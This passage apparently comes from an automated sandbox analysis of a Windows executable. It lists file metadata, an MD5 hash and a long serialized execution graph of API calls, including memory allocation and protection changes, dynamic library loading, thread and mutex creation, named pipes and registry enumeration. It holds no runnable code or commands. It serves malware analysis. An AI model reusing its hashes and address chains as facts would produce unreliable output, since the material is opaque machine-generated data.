                        Imagebase:0x7ff69db50000
                        File size:494488 bytes
                        MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Reset < >

                          Execution Graph

                          Execution Coverage:10.1%
                          Dynamic/Decrypted Code Coverage:43.7%
                          Signature Coverage:24.5%
                          Total number of Nodes:1467
                          Total number of Limit Nodes:28
                          execution_graph 11836 7ff88c0816f8 11837 7ff88c08170e 11836->11837 11838 7ff88c081739 11836->11838 11844 7ff88c07f2b0 EnterCriticalSection 11837->11844 10307 7ff88c072380 10308 7ff88c091440 GetProcessHeap HeapAlloc 10307->10308 10309 7ff88c091484 __scrt_fastfail 10308->10309 10310 7ff88c09169c 10309->10310 10327 7ff88c073db0 10309->10327 10312 7ff88c091a3a 10310->10312 10313 7ff88c0916bf 10310->10313 10314 7ff88c091a5b 10312->10314 10317 7ff88c091a23 10312->10317 10342 7ff88c074820 10313->10342 10404 7ff88c08e7e0 10314->10404 10319 7ff88c091bf0 CreateFileA TryEnterCriticalSection 10412 7ff88c089f80 10319->10412 10328 7ff88c073e79 10327->10328 10329 7ff88c073eea 10327->10329 10423 7ff88c07ae80 10328->10423 10331 7ff88c074184 10329->10331 10332 7ff88c073f21 10329->10332 10466 7ff88c075840 10331->10466 10334 7ff88c089f80 24 API calls 10332->10334 10335 7ff88c073f6a 10334->10335 10437 7ff88c07a970 10335->10437 10337 7ff88c07403d 10453 7ff88c07a2f0 10337->10453 10341 7ff88c074154 10341->10310 10343 7ff88c0748bf 10342->10343 10345 7ff88c074ab2 10342->10345 10669 7ff88c08aa10 10343->10669 10347 7ff88c074c58 10345->10347 10350 7ff88c0898f0 158 API calls 10345->10350 10355 7ff88c074c80 10347->10355 10350->10345 10356 7ff88c074d47 10355->10356 10357 7ff88c0755e4 10355->10357 10360 7ff88c074d5e GetProcAddress 10356->10360 10361 7ff88c075576 LockFile PeekNamedPipe 10356->10361 10358 7ff88c07560d 10357->10358 10359 7ff88c0757b4 10357->10359 10362 7ff88c07579d 10358->10362 10366 7ff88c075640 10358->10366 10359->10362 10365 7ff88c0757df 10359->10365 10364 7ff88c074e78 VirtualAlloc 10360->10364 10373 7ff88c07507a 10360->10373 10361->10362 10380 7ff88c08df20 10362->10380 10370 7ff88c074ec8 10364->10370 10364->10373 10367 7ff88c0757e0 CreateFileA 10365->10367 10368 7ff88c072060 CreateThread 10366->10368 10367->10362 10367->10367 10369 7ff88c0756eb SetEndOfFile 10368->10369 10369->10362 10371 7ff88c074f0f ExitProcess 10370->10371 10372 7ff88c074f46 10370->10372 10376 7ff88c074fbf ExitProcess 10372->10376 10377 7ff88c075013 VirtualAlloc 10372->10377 10373->10373 10374 7ff88c079ba0 158 API calls 10373->10374 10375 7ff88c075571 10374->10375 10375->10362 10377->10373 10381 7ff88c08e018 10380->10381 10388 7ff88c08e3c5 10380->10388 10382 7ff88c08e02f 10381->10382 10384 7ff88c08e199 10381->10384 10715 7ff88c08d350 10382->10715 10383 7ff88c08e2f3 10385 7ff88c08f160 PeekNamedPipe 10383->10385 10384->10383 10387 7ff88c08a750 24 API calls 10384->10387 10385->10388 10387->10384 10390 7ff88c087c20 10391 7ff88c087f40 10390->10391 10392 7ff88c087ca0 10390->10392 10393 7ff88c087f1f 10391->10393 10396 7ff88c087f6e SetEndOfFile 10391->10396 10392->10393 10394 7ff88c087e1e 10392->10394 10395 7ff88c087cb7 VirtualProtect 10392->10395 10393->10317 10394->10393 10400 7ff88c087e7f GetProcessHeap 10394->10400 10401 7ff88c087eac 10394->10401 10397 7ff88c087d06 VirtualProtect 10395->10397 10398 7ff88c078bf0 24 API calls 10396->10398 10397->10394 10398->10393 10400->10401 10402 7ff88c087e9e RtlReleasePrivilege 10400->10402 10719 7ff88c0782d0 10401->10719 10402->10401 10405 7ff88c08e91e 10404->10405 10406 7ff88c08e85f 10404->10406 10407 7ff88c08e93c UnlockFile 10405->10407 10409 7ff88c08e899 10405->10409 10408 7ff88c07a280 2 API calls 10406->10408 10406->10409 10407->10409 10410 7ff88c08e87e 10408->10410 10409->10319 10411 7ff88c07a280 2 API calls 10410->10411 10411->10409 10413 7ff88c08a064 10412->10413 10422 7ff88c08a220 10412->10422 10418 7ff88c0790b0 23 API calls 10413->10418 10413->10422 10414 7ff88c08a3c0 10416 7ff88c08a3f0 CallNamedPipeA 10414->10416 10419 7ff88c08a315 10414->10419 10415 7ff88c08a271 10415->10419 11465 7ff88c0875e0 10415->11465 10416->10416 10416->10419 10420 7ff88c08a19a 10418->10420 10419->10317 11455 7ff88c072390 10420->11455 10422->10414 10422->10415 10424 7ff88c07af67 10423->10424 10426 7ff88c07b204 10423->10426 10473 7ff88c078bf0 10424->10473 10425 7ff88c07b2e2 10428 7ff88c07b30e InitializeCriticalSection 10425->10428 10436 7ff88c07b17a 10425->10436 10426->10425 10511 7ff88c0909d0 10426->10511 10428->10436 10431 7ff88c07b02d 10498 7ff88c072a70 10431->10498 10434 7ff88c07b0bc 10505 7ff88c0732c0 10434->10505 10436->10329 10438 7ff88c07aa26 10437->10438 10447 7ff88c07ae58 10437->10447 10439 7ff88c07aa42 10438->10439 10442 7ff88c07acf1 10438->10442 10440 7ff88c079ac0 2 API calls 10439->10440 10445 7ff88c07aa73 10440->10445 10441 7ff88c07ad72 10621 7ff88c0790b0 10441->10621 10442->10441 10443 7ff88c07ad20 WaitForSingleObject 10442->10443 10443->10441 10443->10443 10446 7ff88c088680 5 API calls 10445->10446 10448 7ff88c07ab5d 10446->10448 10447->10337 10449 7ff88c079ac0 2 API calls 10448->10449 10450 7ff88c07ab87 10449->10450 10450->10450 10612 7ff88c089610 10450->10612 10452 7ff88c07acc4 10452->10337 10454 7ff88c07a41d 10453->10454 10455 7ff88c07a378 10453->10455 10457 7ff88c088380 2 API calls 10454->10457 10627 7ff88c089300 10455->10627 10459 7ff88c074106 10457->10459 10461 7ff88c088380 10459->10461 10462 7ff88c0883c6 10461->10462 10464 7ff88c088464 10461->10464 10462->10464 10635 7ff88c07a280 10462->10635 10464->10341 10467 7ff88c0758ce 10466->10467 10472 7ff88c07597a 10466->10472 10639 7ff88c076d50 10467->10639 10469 7ff88c075958 __scrt_fastfail 10469->10341 10470 7ff88c072a70 6 API calls 10470->10472 10471 7ff88c076820 24 API calls 10471->10472 10472->10469 10472->10470 10472->10471 10474 7ff88c078cdc 10473->10474 10475 7ff88c078f6a 10473->10475 10515 7ff88c088060 10474->10515 10477 7ff88c07908f 10475->10477 10478 7ff88c078f9b 10475->10478 10485 7ff88c078f48 10475->10485 10480 7ff88c07909b CloseHandle 10477->10480 10477->10485 10483 7ff88c072a70 6 API calls 10478->10483 10478->10485 10480->10485 10482 7ff88c078dd7 10531 7ff88c071b10 10482->10531 10483->10485 10487 7ff88c08cdf0 10485->10487 10488 7ff88c08ce61 10487->10488 10494 7ff88c08d00e 10487->10494 10489 7ff88c08ce70 10488->10489 10490 7ff88c08cfcb 10488->10490 10493 7ff88c076820 24 API calls 10489->10493 10491 7ff88c08cfe5 CreateFileMappingA 10490->10491 10490->10494 10491->10494 10495 7ff88c08cf52 10493->10495 10494->10431 10494->10494 10597 7ff88c072060 10495->10597 10499 7ff88c072b11 10498->10499 10504 7ff88c072c11 10498->10504 10500 7ff88c072c16 10499->10500 10501 7ff88c072b46 10499->10501 10499->10504 10503 7ff88c072c43 GetProcessHeap 10500->10503 10500->10504 10601 7ff88c08d5f0 10501->10601 10503->10503 10503->10504 10504->10434 10506 7ff88c07335e 10505->10506 10507 7ff88c073483 10505->10507 10506->10436 10507->10506 10508 7ff88c089f80 24 API calls 10507->10508 10509 7ff88c073536 10508->10509 10510 7ff88c08ed60 24 API calls 10509->10510 10510->10506 10512 7ff88c090aa5 10511->10512 10513 7ff88c090a9a 10511->10513 10512->10426 10513->10512 10608 7ff88c08a750 10513->10608 10516 7ff88c0881e3 10515->10516 10517 7ff88c088104 10515->10517 10519 7ff88c078d5b 10516->10519 10520 7ff88c08825e InitializeCriticalSection 10516->10520 10535 7ff88c0888d0 10517->10535 10522 7ff88c0871b0 10519->10522 10540 7ff88c07a4f0 10520->10540 10523 7ff88c087283 10522->10523 10525 7ff88c0872e7 10522->10525 10526 7ff88c0909d0 23 API calls 10523->10526 10524 7ff88c0875cb 10524->10482 10525->10524 10527 7ff88c08e7e0 3 API calls 10525->10527 10526->10525 10528 7ff88c0874e9 10527->10528 10564 7ff88c076820 10528->10564 10532 7ff88c071b79 10531->10532 10534 7ff88c071b89 10531->10534 10532->10534 10592 7ff88c08ed60 10532->10592 10534->10485 10536 7ff88c088cdf 10535->10536 10538 7ff88c088986 10535->10538 10536->10519 10536->10536 10537 7ff88c071b10 24 API calls 10537->10538 10538->10537 10539 7ff88c088995 10538->10539 10539->10519 10541 7ff88c07a5c2 10540->10541 10542 7ff88c07a742 10540->10542 10543 7ff88c07a789 10541->10543 10544 7ff88c07a5d1 10541->10544 10542->10519 10543->10542 10546 7ff88c07a7d0 EnterCriticalSection 10543->10546 10549 7ff88c0711f0 10544->10549 10546->10542 10546->10546 10548 7ff88c08e7e0 3 API calls 10548->10542 10550 7ff88c071272 10549->10550 10558 7ff88c07130e 10549->10558 10559 7ff88c0884e0 10550->10559 10552 7ff88c0712f8 10553 7ff88c0714a9 10552->10553 10554 7ff88c07147c GetProcessHeap 10552->10554 10553->10548 10554->10553 10556 7ff88c07149b HeapFree 10554->10556 10555 7ff88c071358 10557 7ff88c071370 ReadFile 10555->10557 10555->10558 10556->10553 10557->10555 10557->10557 10558->10552 10558->10555 10558->10558 10562 7ff88c088526 10559->10562 10560 7ff88c088654 10560->10552 10561 7ff88c088616 GetProcessHeap 10561->10560 10563 7ff88c088635 RtlReleasePrivilege 10561->10563 10562->10560 10562->10561 10563->10552 10565 7ff88c0768ce CloseHandle 10564->10565 10566 7ff88c076947 10564->10566 10565->10482 10567 7ff88c076c67 10566->10567 10569 7ff88c071b10 24 API calls 10566->10569 10571 7ff88c088680 10566->10571 10567->10565 10568 7ff88c0909d0 24 API calls 10567->10568 10568->10567 10569->10566 10572 7ff88c088700 10571->10572 10573 7ff88c08886a 10571->10573 10574 7ff88c0887f6 10572->10574 10576 7ff88c08a4a0 10572->10576 10573->10566 10574->10566 10577 7ff88c08a608 HeapCreate LeaveCriticalSection 10576->10577 10579 7ff88c08a505 10576->10579 10590 7ff88c071f20 10577->10590 10580 7ff88c08a5e8 10579->10580 10585 7ff88c079ac0 10579->10585 10580->10574 10583 7ff88c08a54d 10584 7ff88c079ac0 2 API calls 10583->10584 10584->10580 10586 7ff88c079b07 GetProcessHeap 10585->10586 10587 7ff88c079af5 10585->10587 10588 7ff88c079b5c __scrt_fastfail 10586->10588 10589 7ff88c079b2d RtlAllocateHeap 10586->10589 10587->10583 10588->10583 10589->10588 10591 7ff88c071f53 LockFile 10590->10591 10591->10574 10595 7ff88c08edfe 10592->10595 10596 7ff88c08ef01 10592->10596 10593 7ff88c08f060 CreateNamedPipeA 10594 7ff88c078bf0 23 API calls 10593->10594 10594->10595 10595->10593 10595->10596 10596->10534 10598 7ff88c0720a8 10597->10598 10600 7ff88c0720b6 10597->10600 10599 7ff88c072330 CreateThread 10598->10599 10598->10600 10599->10599 10599->10600 10600->10494 10602 7ff88c08d6aa 10601->10602 10605 7ff88c08d72e 10601->10605 10603 7ff88c08d6c0 10602->10603 10606 7ff88c08d7e0 10602->10606 10604 7ff88c079ac0 2 API calls 10603->10604 10604->10605 10605->10504 10606->10605 10607 7ff88c08e7e0 3 API calls 10606->10607 10607->10606 10609 7ff88c08a881 10608->10609 10611 7ff88c08a7cd 10608->10611 10610 7ff88c07a2f0 24 API calls 10609->10610 10609->10611 10610->10611 10611->10512 10613 7ff88c0898d3 10612->10613 10614 7ff88c089699 10612->10614 10613->10452 10615 7ff88c0896b4 10614->10615 10619 7ff88c089723 10614->10619 10616 7ff88c079ac0 2 API calls 10615->10616 10617 7ff88c0896e0 10616->10617 10617->10452 10618 7ff88c089778 LeaveCriticalSection 10620 7ff88c07a4f0 9 API calls 10618->10620 10619->10617 10619->10618 10620->10619 10622 7ff88c079234 10621->10622 10623 7ff88c0793b8 10622->10623 10624 7ff88c079434 10622->10624 10623->10447 10625 7ff88c08ed60 23 API calls 10624->10625 10626 7ff88c079560 DeleteCriticalSection 10625->10626 10626->10623 10628 7ff88c089361 10627->10628 10630 7ff88c07a3d6 10627->10630 10629 7ff88c089f80 24 API calls 10628->10629 10628->10630 10629->10630 10631 7ff88c08bf00 10630->10631 10634 7ff88c08bf64 10631->10634 10632 7ff88c08c49b 10632->10459 10633 7ff88c08d080 ExitProcess 10633->10634 10634->10632 10634->10633 10634->10634 10636 7ff88c07a2de 10635->10636 10637 7ff88c07a2ae GetProcessHeap 10635->10637 10636->10341 10637->10636 10638 7ff88c07a2ca HeapFree 10637->10638 10638->10636 10640 7ff88c076e2c 10639->10640 10641 7ff88c076deb VirtualAlloc 10639->10641 10642 7ff88c072a70 6 API calls 10640->10642 10647 7ff88c0770f7 10641->10647 10643 7ff88c076edf 10642->10643 10648 7ff88c0898f0 10643->10648 10646 7ff88c08a750 24 API calls 10646->10647 10647->10469 10649 7ff88c089cf0 10648->10649 10653 7ff88c076f86 10648->10653 10654 7ff88c079ba0 10649->10654 10651 7ff88c089e24 10652 7ff88c087c20 156 API calls 10651->10652 10652->10653 10653->10646 10656 7ff88c079cc2 10654->10656 10655 7ff88c079da4 10655->10651 10656->10655 10657 7ff88c071b10 24 API calls 10656->10657 10658 7ff88c079f35 10657->10658 10659 7ff88c087c20 156 API calls 10658->10659 10660 7ff88c07a050 10659->10660 10665 7ff88c08f160 10660->10665 10663 7ff88c08cdf0 25 API calls 10664 7ff88c07a21a CreateThread 10663->10664 10664->10651 10666 7ff88c08f209 10665->10666 10667 7ff88c07a15f 10665->10667 10666->10667 10668 7ff88c08f230 PeekNamedPipe 10666->10668 10667->10663 10668->10667 10668->10668 10670 7ff88c08aac9 10669->10670 10672 7ff88c074923 10669->10672 10671 7ff88c07a4f0 9 API calls 10670->10671 10670->10672 10673 7ff88c08ab80 10671->10673 10680 7ff88c077120 10672->10680 10674 7ff88c075840 159 API calls 10673->10674 10675 7ff88c08abff 10674->10675 10676 7ff88c08ed60 24 API calls 10675->10676 10677 7ff88c08acd2 10676->10677 10677->10672 10702 7ff88c08db20 10677->10702 10679 7ff88c08ad80 10679->10672 10681 7ff88c077238 10680->10681 10688 7ff88c0749ab LoadLibraryA 10680->10688 10682 7ff88c077246 10681->10682 10684 7ff88c077368 10681->10684 10683 7ff88c0898f0 158 API calls 10682->10683 10686 7ff88c0772ab 10683->10686 10685 7ff88c07744c WaitForSingleObject UnlockFile 10684->10685 10684->10686 10685->10686 10687 7ff88c08a750 24 API calls 10686->10687 10686->10688 10687->10688 10689 7ff88c072730 10688->10689 10690 7ff88c0727d1 10689->10690 10695 7ff88c072875 10689->10695 10691 7ff88c0728bd 10690->10691 10692 7ff88c0727d9 10690->10692 10694 7ff88c08cdf0 25 API calls 10691->10694 10691->10695 10693 7ff88c072850 GetProcAddress 10692->10693 10692->10695 10693->10695 10694->10691 10696 7ff88c071000 10695->10696 10697 7ff88c07107b 10696->10697 10698 7ff88c071092 GetProcAddress 10696->10698 10697->10698 10699 7ff88c0710fb 10698->10699 10700 7ff88c0710f1 10698->10700 10699->10347 10700->10699 10701 7ff88c071179 HeapWalk 10700->10701 10701->10699 10701->10700 10703 7ff88c08dba4 10702->10703 10704 7ff88c08db6a 10702->10704 10705 7ff88c08dc51 10703->10705 10708 7ff88c078bf0 24 API calls 10703->10708 10704->10705 10709 7ff88c08b9b0 10704->10709 10705->10679 10707 7ff88c08db93 10707->10679 10708->10705 10710 7ff88c08beec 10709->10710 10714 7ff88c08b9f6 10709->10714 10710->10707 10711 7ff88c08ba40 LoadLibraryA 10711->10714 10712 7ff88c08beb8 10712->10707 10713 7ff88c08bd3c GetProcAddress 10713->10714 10714->10711 10714->10712 10714->10713 10716 7ff88c08d581 10715->10716 10718 7ff88c08d3a3 10715->10718 10717 7ff88c08d5b0 GetProcessHeap 10716->10717 10716->10718 10717->10717 10717->10718 10718->10390 10720 7ff88c0782f8 10719->10720 10721 7ff88c078373 10719->10721 10724 27ed3716958 10720->10724 10721->10393 10725 27ed3716967 10724->10725 10726 27ed371697b 10724->10726 10731 27ed3716973 10725->10731 10732 27ed3714db4 HeapCreate 10725->10732 10743 27ed3716ce4 10726->10743 10730 27ed371698e HeapDestroy 10730->10731 10731->10393 10733 27ed3714df5 10732->10733 10742 27ed3714f01 10732->10742 10734 27ed3714e94 10733->10734 10737 27ed3714e26 HeapAlloc 10733->10737 10735 27ed3714ea8 HeapAlloc 10734->10735 10736 27ed3714e9d HeapDestroy 10734->10736 10738 27ed3714ee1 10735->10738 10739 27ed3714ed1 HeapDestroy 10735->10739 10736->10742 10740 27ed3714e4b 10737->10740 10757 27ed37137e0 GetModuleHandleA 10738->10757 10739->10742 10740->10734 10742->10731 10744 27ed3716d06 10743->10744 10745 27ed3716982 10744->10745 10747 27ed371908c SetLastError 10744->10747 10750 27ed3716d2b 10744->10750 10745->10730 10745->10731 10746 27ed3716d5c 10749 27ed3716d71 10746->10749 10751 27ed371908c SetLastError 10746->10751 10747->10750 10748 27ed371908c SetLastError 10748->10750 10752 27ed3716d9f 10749->10752 10753 27ed3716d85 HeapFree 10749->10753 10750->10746 10750->10748 10751->10749 10754 27ed371908c SetLastError 10752->10754 10753->10752 10755 27ed3716dad HeapFree 10754->10755 10755->10745 10824 27ed37140f8 10757->10824 10760 27ed37138bd 10761 27ed3713cb9 10760->10761 10762 27ed37138c8 HeapAlloc 10760->10762 10761->10742 10762->10761 10765 27ed37138e7 10762->10765 10767 27ed371908c SetLastError 10765->10767 10766 27ed37140f8 2 API calls 10768 27ed3713875 10766->10768 10769 27ed3713902 10767->10769 10768->10760 10834 27ed3715fc8 10768->10834 10846 27ed371638c 10769->10846 10774 27ed371908c SetLastError 10776 27ed3713949 10774->10776 10775 27ed3715fc8 4 API calls 10777 27ed37138a5 10775->10777 10778 27ed371398e HeapAlloc 10776->10778 10779 27ed371396a 10776->10779 10777->10760 10780 27ed3715fc8 4 API calls 10777->10780 10782 27ed37139bc 10778->10782 10787 27ed3713a8e 10778->10787 10781 27ed371908c SetLastError 10779->10781 10780->10760 10784 27ed3713978 10781->10784 10783 27ed371908c SetLastError 10782->10783 10785 27ed37139cd 10783->10785 10784->10761 10786 27ed3716ce4 3 API calls 10784->10786 10788 27ed37139d2 RegOpenKeyW 10785->10788 10798 27ed37139fb 10785->10798 10786->10761 10787->10784 10853 27ed371a0ac 10787->10853 10788->10798 10789 27ed3713a7e HeapFree 10789->10787 10791 27ed371908c SetLastError 10791->10798 10793 27ed3713b03 10793->10784 10871 27ed3715058 10793->10871 10794 27ed3713a15 RegEnumKeyW 10794->10798 10795 27ed371a0ac 3 API calls 10795->10793 10798->10789 10798->10791 10798->10794 10799 27ed3713a4c 10798->10799 10803 27ed371908c SetLastError 10799->10803 10800 27ed3713b21 10899 27ed371405c HeapAlloc 10800->10899 10801 27ed3713b4b 10801->10784 10880 27ed371a7a0 10801->10880 10806 27ed3713a6b 10803->10806 10804 27ed3713b2e 10804->10801 10809 27ed371405c HeapAlloc 10804->10809 10807 27ed3713a70 RegCloseKey 10806->10807 10808 27ed3713a7a 10806->10808 10807->10808 10808->10787 10808->10789 10810 27ed3713b40 10809->10810 10810->10801 10811 27ed3713b5c 10811->10784 10812 27ed371908c SetLastError 10811->10812 10813 27ed3713bf1 10812->10813 10814 27ed3713c9d 10813->10814 10815 27ed3713c0d 10813->10815 10901 27ed3719d6c 10814->10901 10816 27ed371908c SetLastError 10815->10816 10818 27ed3713c1b 10816->10818 10819 27ed371908c SetLastError 10818->10819 10820 27ed3713c37 10819->10820 10821 27ed371908c SetLastError 10820->10821 10823 27ed3713c57 10820->10823 10821->10823 10822 27ed371908c SetLastError 10822->10784 10823->10761 10823->10822 10825 27ed371414f 10824->10825 10826 27ed371383d 10824->10826 10825->10826 10827 27ed371415d HeapAlloc 10825->10827 10826->10760 10830 27ed371908c 10826->10830 10827->10826 10829 27ed371418e 10827->10829 10828 27ed37142f0 HeapFree 10828->10826 10829->10826 10829->10828 10831 27ed37190a0 10830->10831 10832 27ed37190c3 SetLastError 10831->10832 10833 27ed3713855 10831->10833 10832->10833 10833->10766 10835 27ed371908c SetLastError 10834->10835 10836 27ed3715ff7 10835->10836 10837 27ed3716006 10836->10837 10838 27ed3715ffc LoadLibraryA 10836->10838 10839 27ed3716048 10837->10839 10840 27ed371600d 10837->10840 10838->10837 10841 27ed371908c SetLastError 10839->10841 10842 27ed37140f8 2 API calls 10840->10842 10845 27ed371388d 10841->10845 10843 27ed371601a 10842->10843 10844 27ed371908c SetLastError 10843->10844 10843->10845 10844->10845 10845->10760 10845->10775 10847 27ed371908c SetLastError 10846->10847 10848 27ed37163c2 10847->10848 10849 27ed371908c SetLastError 10848->10849 10850 27ed37163de 10849->10850 10851 27ed371908c SetLastError 10850->10851 10852 27ed371393b 10850->10852 10851->10852 10852->10774 10854 27ed371908c SetLastError 10853->10854 10855 27ed371a0e6 10854->10855 10856 27ed371a115 10855->10856 10857 27ed371a0eb CreateFileW 10855->10857 10858 27ed371a121 10856->10858 10859 27ed371a1f7 10856->10859 10857->10856 10861 27ed371908c SetLastError 10858->10861 10860 27ed371908c SetLastError 10859->10860 10870 27ed3713ae4 10860->10870 10862 27ed371a12f 10861->10862 10863 27ed371908c SetLastError 10862->10863 10864 27ed371a154 10863->10864 10865 27ed371a159 NtQueryDirectoryFile 10864->10865 10866 27ed371a1ab 10864->10866 10865->10866 10867 27ed371908c SetLastError 10866->10867 10869 27ed371a1b4 10866->10869 10867->10869 10868 27ed371908c SetLastError 10868->10870 10869->10868 10870->10793 10870->10795 10929 27ed3718624 10871->10929 10873 27ed37150a2 10874 27ed3713b1a 10873->10874 10875 27ed371908c SetLastError 10873->10875 10874->10800 10874->10801 10876 27ed37150c5 10875->10876 10877 27ed371908c SetLastError 10876->10877 10878 27ed37150e8 10876->10878 10877->10878 10879 27ed3715134 HeapFree 10878->10879 10879->10874 10881 27ed371908c SetLastError 10880->10881 10882 27ed371a7e1 10881->10882 10883 27ed371a804 10882->10883 10884 27ed371a7ed ConvertStringSecurityDescriptorToSecurityDescriptorW 10882->10884 10885 27ed371a8d2 10883->10885 10939 27ed3711000 10883->10939 10884->10883 10885->10811 10887 27ed371a842 10887->10885 10888 27ed371908c SetLastError 10887->10888 10889 27ed371a85c 10888->10889 10890 27ed371a861 CreateMutexW 10889->10890 10891 27ed371a875 10889->10891 10890->10891 10892 27ed371a8c4 HeapFree 10891->10892 10893 27ed371908c SetLastError 10891->10893 10892->10885 10894 27ed371a88b 10893->10894 10895 27ed371a8ba 10894->10895 10896 27ed371908c SetLastError 10894->10896 10895->10892 10897 27ed371a8ae 10896->10897 10897->10892 10898 27ed371a8b3 FindCloseChangeNotification 10897->10898 10898->10892 10900 27ed371409e 10899->10900 10900->10804 10945 27ed37188c8 HeapAlloc 10901->10945 10903 27ed371a084 10903->10784 10904 27ed3719d9c 10904->10903 10953 27ed37184e8 10904->10953 10908 27ed371908c SetLastError 10910 27ed3719e77 10908->10910 10909 27ed3719e3b 10909->10908 10910->10903 10911 27ed37191c8 HeapAlloc 10910->10911 10912 27ed3719ecd 10911->10912 10913 27ed3719eee 10912->10913 10967 27ed37114b8 10912->10967 10915 27ed37191c8 HeapAlloc 10913->10915 10916 27ed3719f0c 10915->10916 10917 27ed37191c8 HeapAlloc 10916->10917 10919 27ed3719f5a 10917->10919 10918 27ed37191c8 HeapAlloc 10922 27ed3719fa7 10918->10922 10919->10918 10921 27ed3719fd1 10924 27ed371908c SetLastError 10921->10924 10926 27ed371a05a 10921->10926 10981 27ed3712dc4 10921->10981 11009 27ed3717258 10921->11009 10922->10921 10925 27ed371908c SetLastError 10922->10925 10924->10921 10925->10921 10926->10903 11015 27ed3712874 10926->11015 10930 27ed3718659 10929->10930 10931 27ed371908c SetLastError 10930->10931 10937 27ed37186d1 10930->10937 10932 27ed3718678 10931->10932 10933 27ed3718691 HeapAlloc 10932->10933 10932->10937 10934 27ed37186ab 10933->10934 10933->10937 10935 27ed371908c SetLastError 10934->10935 10936 27ed37186b9 10935->10936 10936->10937 10938 27ed37186dd HeapFree 10936->10938 10937->10873 10938->10937 10940 27ed3711050 HeapAlloc 10939->10940 10941 27ed3711042 10939->10941 10944 27ed371107b 10940->10944 10942 27ed371908c SetLastError 10941->10942 10942->10940 10944->10887 10946 27ed3718922 10945->10946 10952 27ed3718967 10945->10952 10947 27ed3715fc8 4 API calls 10946->10947 10948 27ed3718947 10947->10948 10949 27ed371894d HeapAlloc 10948->10949 10948->10952 10950 27ed3718974 10949->10950 10949->10952 10951 27ed371908c SetLastError 10950->10951 10951->10952 10952->10904 10954 27ed371852e 10953->10954 11045 27ed371240c 10954->11045 10956 27ed3718538 10957 27ed371240c 2 API calls 10956->10957 10961 27ed3718584 10956->10961 10958 27ed371854b 10957->10958 10959 27ed371240c 2 API calls 10958->10959 10958->10961 10960 27ed3718567 10959->10960 10960->10961 11050 27ed3716df0 10960->11050 10961->10903 10963 27ed37191c8 10961->10963 10964 27ed37191dd 10963->10964 10965 27ed3719201 10964->10965 11089 27ed37187b0 10964->11089 10965->10909 10968 27ed371908c SetLastError 10967->10968 10969 27ed37114fe HeapAlloc 10968->10969 10971 27ed371152e 10969->10971 10978 27ed371159f 10969->10978 10972 27ed371908c SetLastError 10971->10972 10973 27ed3711566 10972->10973 10974 27ed3711595 10973->10974 10975 27ed37115ab 10973->10975 10976 27ed371908c SetLastError 10974->10976 10977 27ed371908c SetLastError 10975->10977 10976->10978 10979 27ed37115b5 HeapFree 10977->10979 10978->10913 10979->10978 11093 27ed3714320 10981->11093 10986 27ed3712f94 10988 27ed37147b8 SetLastError 10986->10988 11008 27ed3712f48 10986->11008 10988->11008 10990 27ed3712f01 10990->10986 10993 27ed3712f09 10990->10993 10991 27ed3713083 10991->10921 10992 27ed3713034 HeapFree 10997 27ed3713046 10992->10997 11147 27ed3717b6c 10993->11147 10994 27ed371908c SetLastError 11003 27ed3712fe1 10994->11003 10995 27ed3712eea 10995->10990 11142 27ed371a3f8 10995->11142 10997->10991 10998 27ed371908c SetLastError 10997->10998 11000 27ed371305c 10998->11000 11005 27ed371908c SetLastError 11000->11005 11001 27ed371300b 11001->10991 11001->10992 11003->11001 11006 27ed37147b8 SetLastError 11003->11006 11004 27ed3712f71 HeapFree 11161 27ed37147b8 11004->11161 11005->10991 11006->11001 11008->10994 11008->11001 11010 27ed37174e1 11009->11010 11012 27ed371728d 11009->11012 11010->10921 11011 27ed371746f HeapAlloc 11011->11012 11012->11010 11012->11011 11350 27ed3717fd4 11012->11350 11016 27ed3712a25 HeapFree 11015->11016 11017 27ed371287d 11015->11017 11016->10903 11018 27ed3712a17 11017->11018 11019 27ed371908c SetLastError 11017->11019 11020 27ed371908c SetLastError 11018->11020 11021 27ed37128bd 11019->11021 11020->11016 11449 27ed3715e88 11021->11449 11024 27ed3712902 11025 27ed3712922 11024->11025 11027 27ed371908c SetLastError 11024->11027 11028 27ed371908c SetLastError 11025->11028 11026 27ed371908c SetLastError 11029 27ed37128e6 11026->11029 11027->11025 11031 27ed371293b 11028->11031 11030 27ed371908c SetLastError 11029->11030 11030->11024 11032 27ed3712964 11031->11032 11034 27ed3715e88 SetLastError 11031->11034 11033 27ed371908c SetLastError 11032->11033 11035 27ed3712972 11033->11035 11034->11031 11036 27ed371908c SetLastError 11035->11036 11037 27ed37129a2 11035->11037 11036->11035 11038 27ed37129c4 11037->11038 11040 27ed371908c SetLastError 11037->11040 11039 27ed37129d9 11038->11039 11041 27ed371908c SetLastError 11038->11041 11042 27ed37129f9 11039->11042 11044 27ed371908c SetLastError 11039->11044 11040->11037 11041->11039 11042->11018 11043 27ed3712a0c HeapFree 11042->11043 11043->11018 11044->11042 11046 27ed371908c SetLastError 11045->11046 11047 27ed3712443 HeapAlloc 11046->11047 11049 27ed371246f 11047->11049 11049->10956 11051 27ed37191c8 HeapAlloc 11050->11051 11052 27ed3716e40 11051->11052 11053 27ed3717010 HeapFree 11052->11053 11054 27ed371908c SetLastError 11052->11054 11088 27ed3717221 11052->11088 11057 27ed371705b 11053->11057 11053->11088 11056 27ed3716e83 HeapAlloc 11054->11056 11056->11053 11064 27ed3716eb4 11056->11064 11058 27ed37191c8 HeapAlloc 11057->11058 11060 27ed3717079 11058->11060 11061 27ed37191c8 HeapAlloc 11060->11061 11060->11088 11062 27ed37170c9 11061->11062 11063 27ed3717166 11062->11063 11065 27ed371908c SetLastError 11062->11065 11066 27ed37191c8 HeapAlloc 11063->11066 11067 27ed371908c SetLastError 11064->11067 11083 27ed3716f27 11064->11083 11074 27ed37170fd 11065->11074 11075 27ed3717185 11066->11075 11068 27ed3716ef7 HeapAlloc 11067->11068 11068->11083 11069 27ed3717021 HeapFree 11069->11053 11070 27ed3716f86 11072 27ed371908c SetLastError 11070->11072 11073 27ed3716f94 11072->11073 11078 27ed371908c SetLastError 11073->11078 11076 27ed371908c SetLastError 11074->11076 11077 27ed371908c SetLastError 11075->11077 11075->11088 11079 27ed3717142 HeapFree 11076->11079 11080 27ed37171d2 11077->11080 11081 27ed3716fde 11078->11081 11079->11063 11085 27ed371908c SetLastError 11080->11085 11081->11053 11084 27ed3716fef HeapFree HeapFree 11081->11084 11083->11069 11083->11070 11084->11053 11086 27ed37171ec 11085->11086 11087 27ed371908c SetLastError 11086->11087 11087->11088 11088->10961 11090 27ed37187e4 11089->11090 11092 27ed3718804 11089->11092 11091 27ed37187ec HeapAlloc 